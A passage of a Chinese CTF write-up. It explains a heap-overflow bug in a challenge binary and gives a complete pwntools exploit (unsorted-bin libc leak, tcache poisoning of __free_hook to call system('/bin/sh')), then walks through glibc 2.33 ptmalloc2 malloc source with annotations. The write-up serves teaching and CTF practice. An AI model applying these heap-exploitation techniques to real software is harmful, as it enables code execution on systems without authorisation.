read(0, Pr_Arr[v1], (unsigned int)nbytes);

这里这处可疑的 强制类型转换 实在太可疑了.
nbytes 的型别很容易推断出是 int
接下来推断 Size_Arr 的型别为:

Size_Arr 中的值只有一个来源就是 Alloc() 中的:

1
Size_Arr[idx] = nbytes;

对应的汇编代码是:

1
2
3
4
5
6
7
.text:0000000000000A48 ; 12:   Size_Arr[idx] = nbytes;
.text:0000000000000A48 mov eax, dword ptr [rbp+pr]
.text:0000000000000A4B movsxd rdx, eax
.text:0000000000000A4E mov eax, [rbp+idx]
.text:0000000000000A51 lea rcx, ds:0[rax*8]
.text:0000000000000A59 lea rax, Size_Arr
.text:0000000000000A60 mov [rcx+rax], rdx

可以看到 movsxd 也就是 nbytes 被符号扩展为 Size_Arr[idx]
那么就能推断出 Size_Arr 的型别为:int64_t[].那么

问题来了:Edit()nbytesSize_Arr[v1] 的型别分别是 int32_tint64_t,两者比较大小时,若无强制类型转换,编译器应当由隐式类型转换规则对 int32_t 进行符号扩展,也就是将 int32_t 转换为 int64_t,然后比较根据有符号数的比较规则比较两者大小即可.

为了验证,可以查看汇编代码:

1
2
3
4
5
6
7
8
9
10
11
.text:0000000000000C0A ; 13:   if ( nbytes <= 0 || nbytes >= (unsigned __int64)Size_Arr[v1] )
.text:0000000000000C0A cmp dword ptr [rbp+nbytes], 0
.text:0000000000000C0E jle short loc_C76
.text:0000000000000C10 mov eax, dword ptr [rbp+nbytes]
.text:0000000000000C13 movsxd rdx, eax
.text:0000000000000C16 mov eax, [rbp+var_8]
.text:0000000000000C19 lea rcx, ds:0[rax*8]
.text:0000000000000C21 lea rax, Size_Arr
.text:0000000000000C28 mov rax, [rcx+rax]
.text:0000000000000C2C cmp rdx, rax
.text:0000000000000C2F jnb short loc_C76

在汇编代码中能看到这处语句中对 nbytes 先进行了符号扩展:

1
2
.text:0000000000000C10                 mov     eax, dword ptr [rbp+nbytes]
.text:0000000000000C13 movsxd rdx, eax

rdxrax 的比较却使用了比较无符号数的汇编指令 jnb

这反常的行为提醒着需要提高警惕.
所以笔者就猜测此处应该存在整数溢出的问题.
但看起来出题者通过检测 nbytes <= 0 堵住了 nbytes 发生整数溢出的可能.

那么,Size_Arr[v1] 能发生溢出吗?

确实能,但不用也行……

回看 Alloc()

1
2
3
4
5
6
7
nbytes = read_Int();
Size_Arr[idx] = nbytes;
if ( nbytes > 1024 )
return puts("error!");
pr = malloc(nbytes);
if ( !pr )
return puts("error!");

会惊讶的发现,读取道德 nbytes 被直接写入了 Size_Arr,写入之后才验证数据是否合法.
这意味着可以通过执行 Alloc() 来任意改变 Size_Arr 中的元素.

例如在对 idx 为 0 分配 0x20 的空间后,能通过对 idx 为 0 再次执行 Alloc(),输入 size 大于 1024,实现将 Size_Arr[idx] 修改.
接下来就能通过 Edit() 实现堆溢出.

好了,这就是本题可供利用的漏洞了.若说整数溢出,唯一于此相关的就是:在对 idx 再次执行 Alloc 输入 size 时可以出入 -1,这样在后面调用 Edit() 时就能输入任意的整数作为 size 进行 edit 了.
但不利用这点也完全能解出本题(笔者也想不通出题人为什么在这里放一个整数溢出的 bugs,或许就是为了干扰答题者的思路?).

解题思路

上面说了漏洞所在.下面聊聊解题思路吧.

首先,利用 Unsort Bin Attack 泄露 main_area 的地址,进而泄露 libc 基址.
其后,利用 tcache poisoning 劫持 __free_hooksystemfree 写着 /bin/sh\x00 的内存即可.

通过逆向工程得到的伪代码能轻易写出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *

context(log_level='debug', os='linux', arch='amd64')
# context.terminal = ['tmux', 'split', '-h']

path = "/home/admin/pwn/main"

libcpath = "/home/admin/libcs/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so"

libc = ELF(libcpath)
elf = ELF(path)
r = process(path)
# r = remote("113.201.14.253", 21111)


def up6(addr_port: bytes):
log.debug("get bytes "+addr_port.hex())
recvlen = len(addr_port)
log.debug("recv len "+hex(recvlen))
assert(recvlen == 6)

return u64(addr_port.ljust(8, b"\x00"))


def i2b(n: int, Hex: bool = False):
return bytes(hex(n) if Hex else str(n), encoding="ascii")


def content(cont: bytes):
r.sendlineafter(b"content?\n", cont)
r.recvuntil(b'success!\n')


def Show(idx: int):
r.sendlineafter(b">>\n", i2b(4))
r.sendlineafter(b"idx?\n", i2b(idx))
r.recvuntil(b': ')
return r.recvuntil(b"\nsuccess!\n", drop=True)


def Alloc(idx: int, size: int, cont: bytes = None):
r.sendlineafter(b">>\n", i2b(1))
r.sendlineafter("idx?\n", i2b(idx))
r.sendlineafter("size?\n", i2b(size))
if cont is None:
r.recvline()
else:
content(cont)


def Edit(idx: int, size: int, cont: bytes):
r.sendlineafter(b">>\n", i2b(3))
r.sendlineafter("idx?\n", i2b(idx))
r.sendlineafter("size?\n", i2b(size))
# pause()

r.sendafter(b"content?\n", cont)
r.recvuntil(b'success!\n')


def Delete(idx: int):
r.sendlineafter(b">>\n", i2b(2))
r.sendlineafter("idx?\n", i2b(idx))

下面申请通过 #0 的溢出能将 #1 的 size 修改为 1-5 的 chunk size 总和.#6 是用来防止 #5 与 top chunk 相邻.

1
2
3
4
5
6
7
8
9
10
11
12
Alloc(0, 0x10, b"123")
Alloc(1, 0xf8, b"123") # 1
Alloc(2, 0xf8, b"123") # 2
Alloc(3, 0xf8, b"/bin/sh\x00") # 3
Alloc(4, 0xf8, b"123") # 4
Alloc(5, 0xf8, b"123") # 5
Alloc(6, 0x10, b"234")

Alloc(0, -1)
payload = cyclic(0x18)+p64(0x501)
Edit(0, 0x20, payload)
Delete(1)

通过这一步,libc 认为 free 掉了一个大小为 0x500 的块,这个块超过了 tcache 的最大值,所以被放进了 Unsort Bin.chunk 的 fd 和 bk 均指向 main_area+96,通过这里得到 libc 基址.
就是要泄露 fd 指针了.通过 show #0 泄露 fd.

1
2
3
4
5
6
7
8
Edit(0, 0x20, cyclic(0x20))
buf = Show(0)
addr = buf[0x20:]
main_area_Addr = up6(addr)-96
__malloc_hook_Addr = main_area_Addr-0x10
libc_base = __malloc_hook_Addr-libc.symbols['__malloc_hook']
__free_hook_Addr = libc_base+libc.symbols['__free_hook']
system_Addr = libc_base+libc.symbols['system']

好了,泄露部分完毕,只剩下使用 tcache poisoning 劫持 __free_hook 的部分了.

1
2
3
4
5
payload = cyclic(0x18)+p64(0x501)
Edit(0, 0x20, payload)

Alloc(1, 0xf8, b"123")
Delete(1)

这次分配中,将 0x500 的 chunk 切分出了 0x100 的部分.通过 Delete 掉分配的 chunk,它进入了 tcache

1
2
3
4
5
payload = cyclic(0x18)+p64(0x101)+p64(__free_hook_Addr)
Edit(0, 0x28, payload)

Alloc(1, 0xf8, b"123")
Alloc(7, 0xf8, p64(system_Addr))

再次利用溢出,修改 tcache 的 next.并通过第二次 Alloc 获得指向 __free_hook 的指针,并 __free_hook 改为 system_Addr

1
2
Delete(3)
r.interactive()

最后,利用被改成 system_Addr__free_hookfree 掉指向 /bin/sh\x00 的指针.
解题完毕.

完整 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
from pwn import *

context(log_level='debug', os='linux', arch='amd64')
# context.terminal = ['tmux', 'split', '-h']

path = "/home/admin/pwn/main"

libcpath = "/home/admin/libcs/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so"

libc = ELF(libcpath)
elf = ELF(path)
r = process(path)
# r = remote("113.201.14.253", 21111)


def up6(addr_port: bytes):
log.debug("get bytes "+addr_port.hex())
recvlen = len(addr_port)
log.debug("recv len "+hex(recvlen))
assert(recvlen == 6)

return u64(addr_port.ljust(8, b"\x00"))


def i2b(n: int, Hex: bool = False):
return bytes(hex(n) if Hex else str(n), encoding="ascii")


def content(cont: bytes):
r.sendlineafter(b"content?\n", cont)
r.recvuntil(b'success!\n')


def Show(idx: int):
r.sendlineafter(b">>\n", i2b(4))
r.sendlineafter(b"idx?\n", i2b(idx))
r.recvuntil(b': ')
return r.recvuntil(b"\nsuccess!\n", drop=True)


def Alloc(idx: int, size: int, cont: bytes = None):
r.sendlineafter(b">>\n", i2b(1))
r.sendlineafter("idx?\n", i2b(idx))
r.sendlineafter("size?\n", i2b(size))
if cont is None:
r.recvline()
else:
content(cont)


def Edit(idx: int, size: int, cont: bytes):
r.sendlineafter(b">>\n", i2b(3))
r.sendlineafter("idx?\n", i2b(idx))
r.sendlineafter("size?\n", i2b(size))
# pause()

r.sendafter(b"content?\n", cont)
r.recvuntil(b'success!\n')


def Delete(idx: int):
r.sendlineafter(b">>\n", i2b(2))
r.sendlineafter("idx?\n", i2b(idx))


Alloc(0, 0x10, b"123")
Alloc(1, 0xf8, b"123") # 1
Alloc(2, 0xf8, b"123") # 2
Alloc(3, 0xf8, b"/bin/sh\x00") # 3
Alloc(4, 0xf8, b"123") # 4
Alloc(5, 0xf8, b"123") # 5
Alloc(6, 0x10, b"234")

Alloc(0, -1)
payload = cyclic(0x18)+p64(0x501)
Edit(0, 0x20, payload)
Delete(1)

Edit(0, 0x20, cyclic(0x20))
buf = Show(0)
addr = buf[0x20:]
main_area_Addr = up6(addr)-96
__malloc_hook_Addr = main_area_Addr-0x10
libc_base = __malloc_hook_Addr-libc.symbols['__malloc_hook']
__free_hook_Addr = libc_base+libc.symbols['__free_hook']
system_Addr = libc_base+libc.symbols['system']

payload = cyclic(0x18)+p64(0x501)
Edit(0, 0x20, payload)

Alloc(1, 0xf8, b"123")
Delete(1)

payload = cyclic(0x18)+p64(0x101)+p64(__free_hook_Addr)
Edit(0, 0x28, payload)

Alloc(1, 0xf8, b"123")
Alloc(7, 0xf8, p64(system_Addr))

Delete(3)
r.interactive()

ptmalloc2 源码解析

warning
WARNING

本文所有解读仅代表 Y7n05h 的个人见解,不代表 Glibc 的贡献者观点.
受限于 Y7n05h 的能力于水平,Y7n05h 无法保证本文的正确性.

info
INFO

本文文中所有代码均使用 LGLP 2.1 or later 授权.
本文所述内容均基于 Glibc 2.33.Y7n05h 对 malloc.c 按照自己的代码风格偏好进行了重新格式化并添加了注释,修改后的 malloc.c 见本文附录.

malloc

tip
TIP

在初次阅读 ptmalloc2 源码的过程中,笔者建议暂且忽略「多线程环境下的特殊行为」、「调试信息」、「TCACHE」等相关内容.笔者将在了解 malloc 的大致流程后,再次阅读与「多线程环境」、「TCACHE」相关的代码.
有关「调试信息」的内容笔者不做解读.
有关「多线程环境」、「TCACHE」相关的内容将在本文结尾处补充.

略去关于「编译」和「链接」的细节,在此可以认为 malloc() 就是调用了 void *__libc_malloc(size_t bytes)

__libc_malloc() 源码中:

1
2
3
void *(*hook)(size_t, const void *) = atomic_forced_read(__malloc_hook);//使用原子操作读取 __malloc_hook 将其赋值给 hook
if (__builtin_expect(hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS(0));

__malloc_hook 是全局变量,定义是:

1
void *weak_variable (*__malloc_hook)(size_t __size, const void *) = malloc_hook_ini;
1
2
3
4
5
6
7
static void *
malloc_hook_ini (size_t sz, const void *caller)
{
__malloc_hook = NULL;
ptmalloc_init ();
return __libc_malloc (sz);
}

在程序运行时,__malloc_hook 被初始化为 malloc_hook_ini.在程序中调用 __malloc_hook 时,通过原子操作读取至局部变量 hook

info
INFO

weak_variable 的定义是:

1
2
#define weak_variable weak_function
# define weak_function __attribute__ ((weak))

__attribute__ ((weak))GCC 提供的语法扩展,可以将一个「符号」定义为「弱符号」.

这是关于「链接」的内容,有兴趣的读者请自行查阅相关资料.
如读者尚未理解 weak_variable 的含义,只需无视 weak_variable 即可,不影响后文的阅读.

info
INFO

1
2
# define __glibc_unlikely(cond)	__builtin_expect ((cond), 0)
# define __glibc_likely(cond) __builtin_expect ((cond), 1)

__builtin_expect ((cond), 0)__builtin_expect ((cond), 1) 都是针对「分支预测」的做出的优化.

  • __builtin_expect ((cond), 0) 表示大多数情况下 cond == False.通常使用 __glibc_unlikely(cond) 简化.
  • __builtin_expect ((cond), 1) 表示大多数情况下 cond == True.通常使用 __glibc_likely(cond) 简化.
    注意:__builtin_expect ((cond), 0) == cond__builtin_expect ((cond), 1) == cond__builtin_expect 不改变 cond 的值!
1
2
3
4
5
6
if (SINGLE_THREAD_P)// 是单线程
{
victim = TAG_NEW_USABLE(_int_malloc(&main_arena, bytes));
assert(!victim || chunk_is_mmapped(mem2chunk(victim)) || &main_arena == arena_for_chunk(mem2chunk(victim)));
return victim;
}

这段代码看似复杂,实际上很简单,核心的代码只有:

1
2
3
4
if (SINGLE_THREAD_P)// 是单线程
{
return _int_malloc(&main_arena, bytes);
}

进入 _int_malloc()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 /*
Convert request size to internal form by adding SIZE_SZ bytes overhead plus possibly more to obtain necessary alignment and/or
to obtain a size of at least MINSIZE, the smallest allocatable size.
Also, checked_request2size returns false for request sizes that are so large that they wrap around zero when padded and aligned.
*/

if (!checked_request2size(bytes, &nb))// 根据 bytes 、元数据大小、对齐要求计算 nb
{
__set_errno(ENOMEM);
return NULL;
}

/* There are no usable arenas. Fall back to sysmalloc to get a chunk from mmap. */
if (__glibc_unlikely(av == NULL)) {
void *p = sysmalloc(nb, av);// av 不存在,向 system 申请更多的 memory
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}

fastbin 检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#define REMOVE_FB(fb, victim, pp)                                          \
do { \
victim = pp; \
if (victim == NULL) \
break; \
pp = REVEAL_PTR(victim->fd); \
if (__glibc_unlikely(pp != NULL && misaligned_chunk(pp))) \
malloc_printerr("malloc(): unaligned fastbin chunk detected"); \
} while ((pp = catomic_compare_and_exchange_val_acq(fb, pp, victim)) != victim);

if ((unsigned long) (nb) <= (unsigned long) (get_max_fast()))// get_max_fast() 默认值为 DEFAULT_MXFAST
{
// 因为 nb 是对齐的,当 nb <= get_max_fast() 时,必为 fastbin 的合法大小.不存在 nb 不超过 get_max_fast() 却无 fastbin_index 与之对应的情况.
idx = fastbin_index(nb);
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp;
victim = *fb;

if (victim != NULL) {//对应的 fastbin 不为空
if (__glibc_unlikely(misaligned_chunk(victim)))
malloc_printerr("malloc(): unaligned fastbin chunk detected 2");

if (SINGLE_THREAD_P) //单线程
*fb = REVEAL_PTR(victim->fd);// 删除第一个节点.REVEAL_PTR 是为了提高安全性,抵抗恶意攻击.
else // 多线程
REMOVE_FB(fb, pp, victim);
if (__glibc_likely(victim != NULL)) {
size_t victim_idx = fastbin_index(chunksize(victim));// 本行的计算是为了下一行的 assert
if (__builtin_expect(victim_idx != idx, 0))
malloc_printerr("malloc(): memory corruption (fast)");
check_remalloced_chunk(av, victim, nb);// malloc_debug 的 assert
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size, stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins) {
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) {
if (__glibc_unlikely(misaligned_chunk(tc_victim)))
malloc_printerr("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR(tc_victim->fd);
else {
REMOVE_FB(fb, pp, tc_victim);
if (__glibc_unlikely(tc_victim == NULL))
break;
}
tcache_put(tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}//对应的 fastbin 为空
}

此时笔者只关注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/* 删去了暂不关注的内容 */
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast()))// get_max_fast() 默认值为 DEFAULT_MXFAST
{
// 因为 nb 是对齐的,当 nb <= get_max_fast() 时,必为 fastbin 的合法大小.不存在 nb 不超过 get_max_fast() 却无 fastbin_index 与之对应的情况.
idx = fastbin_index(nb);
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp;
victim = *fb;

if (victim != NULL) {//对应的 fastbin 不为空
if (__glibc_unlikely(misaligned_chunk(victim)))
malloc_printerr("malloc(): unaligned fastbin chunk detected 2");

if (SINGLE_THREAD_P) //单线程
*fb = REVEAL_PTR(victim->fd);// 删除第一个节点.REVEAL_PTR 是为了提高安全性,抵抗恶意攻击.

if (__glibc_likely(victim != NULL)) {
size_t victim_idx = fastbin_index(chunksize(victim));// 本行的计算是为了下一行的 assert
if (__builtin_expect(victim_idx != idx, 0))
malloc_printerr("malloc(): memory corruption (fast)");
check_remalloced_chunk(av, victim, nb);// malloc_debug 的 assert

void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}//对应的 fastbin 为空
}

nbfastbin 范围内,则计算 nb 对应的 fastbin 下标 idx.根据 idxav 中取出对应的链表(其头指针的指针为 fb,其首节点为 victim).

  • victim == NULL,则链表为空,完成对 fastbin 的检查.
  • victim != NULL,则从 fb 中移除 victim,返回对应的指针._int_malloc() 返回.

smallbin 检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
    /*
If a small request, check regular bin.
Since these "smallbins" hold one size each, no searching within bins is necessary.
(For a large request, we need to wait until unsorted chunks are processed to find best fit.
But for small ones, fits are exact anyway, so we can check now, which is faster.)
*/

if (in_smallbin_range(nb)) {// 准确的表述为:不满足 LargeBin 分配的最小值

//值得注意的是:在fastbin 环节分配失败会进入此处.
idx = smallbin_index(nb);
bin = bin_at(av, idx);

//别忘了 FastBin 与 SmallBin 有重叠,在 FastBin 分配不成功的执行流有可能在 SmallBin 中完成分配
if ((victim = last(bin)) != bin)// smallbin 是双向链表,last(bin)!=bin 则 bin 不为空.
{
bck = victim->bk;
if (__glibc_unlikely(bck->fd != victim))
malloc_printerr("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;

if (av != &main_arena)
set_non_main_arena(victim);
check_malloced_chunk(av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size, stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins) {
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin) {
if (tc_victim != 0) {
bck = tc_victim->bk;
set_inuse_bit_at_offset(tc_victim, nb);
if (av != &main_arena)
set_non_main_arena(tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put(tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

nbSmallBin范围内(也就是不足 LargeBin 的最小值),则尝试使用 SmallBin

  1. 根据 nb 计算对应的 下标 idx,根据 idx 定位到链表的头节点 bin
    • (victim = last(bin)) == bin,则链表为空,则 SmallBin 无法满足 nb 的需求,结束 SmallBin 检查.
    • (victim = last(bin)) != bin,则链表不空,那么从链表中删去尾节点.将尾节点对应的指针返回.

tip
TIP

对比 FastBinSmallBin

  • FastBin 使用单链表管理空闲的 chunk
  • SmallBin 使用双向循环链表管理空闲的 chunk

FastBin 使用指向「第一个节点的指针」的指针管理单链表.

1
mfastbinptr *fb = &fastbin(av, idx);

  • *fb == NULL 时,链表为空.
  • *fb != NULL 时,链表不空.*fb 指向第一个空闲的 chunk

SmallBin 使用指向「头节点」的指针管理双向循环链表.

1
bin = bin_at(av, idx);// bin 是头节点的指针

bin 指向链表中第头节点,头节点不是有效的空闲 chunk,头节点只是为了更方便管理双向循环链表人为添加的节点.

  • bin->bk == bin 时,链表为空(指除了头节点之外没有其他节点).
  • bin->bk != bin 时,链表不空.

FastBinSmallBin 中的每个链表中的 chunk 的大小相同.

UnsortBin 检查

执行至此说明在 FastBinSamllBin 中未能完成内存分配.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
        int iters = 0;// 下面的 while 循环的循环变量

while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {// 当 UnsortBin 不为空时,进行循环.

bck = victim->bk;//victim 是 UnsortBin 中的 尾节点,bck 指向倒数第 2 个节点
size = chunksize(victim);
mchunkptr next = chunk_at_offset(victim, size);

/* 安全检查 */
if (__glibc_unlikely(size <= CHUNK_HDR_SZ) || __glibc_unlikely(size > av->system_mem))
malloc_printerr("malloc(): invalid size (unsorted)");
if (__glibc_unlikely(chunksize_nomask(next) < CHUNK_HDR_SZ) || __glibc_unlikely(chunksize_nomask(next) > av->system_mem))
malloc_printerr("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely((prev_size(next) & ~(SIZE_BITS)) != size))
malloc_printerr("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely(bck->fd != victim) || __glibc_unlikely(victim->fd != unsorted_chunks(av)))
malloc_printerr("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely(prev_inuse(next)))
malloc_printerr("malloc(): invalid next->prev_inuse (unsorted)");


/* 有删节 */

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)// iter 表示迭代数量,防止 UnsortBin 过长造成响应速度严重下降
break;
}

安全检查用来及时发现相关数据结构被意外损坏或被恶意篡改.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
If a small request, try to use last remainder if it is the only chunk in unsorted bin.
This helps promote locality for runs of consecutive small requests.
This is the only exception to best-fit, and applies only when there is no exact fit for a small chunk.
*/


if (in_smallbin_range(nb) && // SmallBin 可满足需求
bck == unsorted_chunks(av) && //倒数第二个节点是头节点,即 UnsortBin 中有且仅有一个节点.请注意上方的英文注释.
victim == av->last_remainder && // 是上次剩余的块
(unsigned long) (size) > (unsigned long) (nb + MINSIZE)//若 目标块 大于 所需 且 剩余部分可形成一个新的 chunk
) {
/* split and reattach remainder */
remainder_size = size - nb; // 剩余 chunk 大小
remainder = chunk_at_offset(victim, nb);//返回 剩余的 chunk 的 ptr
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks(av);
if (!in_smallbin_range(remainder_size)) {//检测剩余 chunk 是否在 SmallBin 范围中,不在则设置 fd 与 bk
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));// ??? 为什么在这里需要设置 PREV_INUSE
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);

check_malloced_chunk(av, victim, nb);//malloc debug 的 assert
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

UnsortBin 中仅剩余上次分割的 chunk(且这个 chunk 大于 nb + MINSIZE,即满足 nb 且剩余部分能形成一个新的 chunk)时,使用这个 chunk,并将剩余部分根据大小插入 SmallBinLargeBin

1
2
3
4
5
/* remove from unsorted list */
if (__glibc_unlikely(bck->fd != victim))// bck 是 victim 的前驱,bck 的后继理应等于 victim
malloc_printerr("malloc(): corrupted unsorted chunks 3");
unsorted_chunks(av)->bk = bck;//从 UnsortBin 中删除 victim
bck->fd = unsorted_chunks(av);

将当前节点 victimUnsortBin 中删除.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
            /* Take now instead of binning if exact fit */

if (size == nb) {
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills. We may return one of these chunks later. */
if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) {
tcache_put(victim, tc_idx);
return_cached = 1;
continue;
} else {
#endif
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

若当前节点 victim 大小与 nb 相同,则返回当前节点对应的 chunk 对应的指针.结束分配流程.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
/* size != bin */
/* place chunk in bin */

if (in_smallbin_range(size)) {
victim_index = smallbin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;
} else {
victim_index = largebin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck) {//若 LargeBin 不为空
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert(chunk_main_arena(bck->bk));//???
if ((unsigned long) (size) < (unsigned long) chunksize_nomask(bck->bk))
//bck->bk 是最小的 chunk,所以 large 是非递增序列
{
fwd = bck;
bck = bck->bk;
//fd_next bk_next 不包含 头节点
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
} else {
assert(chunk_main_arena(fwd));
while ((unsigned long) size < chunksize_nomask(fwd)) {
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}

if ((unsigned long) size == (unsigned long) chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;//???
else {
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely(fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr("malloc(): largebin double linked list corrupted (bk)");
}
} else
//若 LargeBin 为空
victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

fwdbck 的设置可能为本段代码的阅读带来了一些困扰.在本段代码中,因各个分支均需要实现对 victim 插入链表中,为复用更多的代码,在每种情况中可以只合理的设置 fwdbck,在本段末尾处通过设置好的 fwdbck 集中完成插入.(在将 victim 插入 LargeBin 的情况中,每个分支均需额外设置 fd_nextsizebk_nextsize

LargeBin 检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
 /*
If a large request, scan through the chunks of current bin in sorted order to find smallest that fits. Use the skip list for this.
*/

//是 大请求
if (!in_smallbin_range(nb)) {
bin = bin_at(av, idx);

/* skip scan if empty or largest chunk is too small */
if ((victim = first(bin)) != bin && (unsigned long) chunksize_nomask(victim) >= (unsigned long) (nb)) {
victim = victim->bk_nextsize;//victim 现在指向最小的 chunk
while (((unsigned long) (size = chunksize(victim)) < (unsigned long) (nb)))
victim = victim->bk_nextsize;

// 两个 chunk 一样大,用第二个 chunk ???
/* Avoid removing the first entry for a size so that the skip list does not have to be rerouted. */
if (victim != last(bin) && chunksize_nomask(victim) == chunksize_nomask(victim->fd))
victim = victim->fd;

remainder_size = size - nb;
unlink_chunk(av, victim);

/* Exhaust */
if (remainder_size < MINSIZE) {//剩余部分不足以形成新的 chunk,那么不做切割
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}
/* Split */
else {//剩余部分可以形成新的 chunk
remainder = chunk_at_offset(victim, nb);

// UnsortBin 最多只遍历 MAX_ITERS 次,无法保证为空
/* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
malloc_printerr("malloc(): corrupted unsorted chunks");
remainder->bk = bck;//在 UnsortBin 的头节点之后插入剩余 chunk
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range(remainder_size)) {//如果不是 SmallChunk 则将 fd_next bk_next 置为 NULL
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

nb 不在 SmallBin 范围内,则从 LargeBin 中寻找最合适的chunk(大于等于 nb 的最小 chunk).
若最合适的 chunk 的大小大于 nb + MINSIZE 则进行分割,剩余部分放在 UnsortBin 中.之后返回切分出的 chunk 对应的指针.结束分配流程.

其他情况

1
2
3
4
5
6
7
8
9
10
11
12
13
 /*
Search for a chunk by scanning bins, starting with next largest bin.
This search is strictly by best-fit; i.e., the smallest (with ties going to approximately the least recently used) chunk that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
